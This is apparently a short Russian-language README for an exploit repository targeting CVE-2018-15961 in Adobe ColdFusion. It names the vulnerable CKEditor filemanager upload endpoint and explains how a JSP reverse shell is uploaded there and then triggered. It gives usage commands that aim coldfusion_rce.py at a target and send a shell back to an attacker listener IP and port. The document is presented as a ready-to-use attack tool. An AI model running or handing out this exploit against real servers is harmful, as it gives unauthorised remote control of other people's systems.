
CVE-2018-15961 — ᴀᴅᴏʙᴇ ᴄᴏʟᴅғᴜsɪᴏɴ (ʀᴄᴇ)
Этот репозиторий содержит мой эксплойт для уязвимости RCE в Adobe ColdFusion 2021.
Эксплойт отправляет POST-запрос, содержащий JSP reverse shell, на /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm. В случае успеха этот запрос загружает shell в /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/shell.jsp. Затем код запускает shell, отправляя простой GET-запрос.
# Basic usage
python3 coldfusion_rce.py -u http://172.31.1.15:8500 -l 10.10.0.25 -p 443
# With custom filename for the shell
python3 coldfusion_rce.py -u http://172.31.1.15:8500 -l 10.10.0.25 -p 443 -f reverse.jsp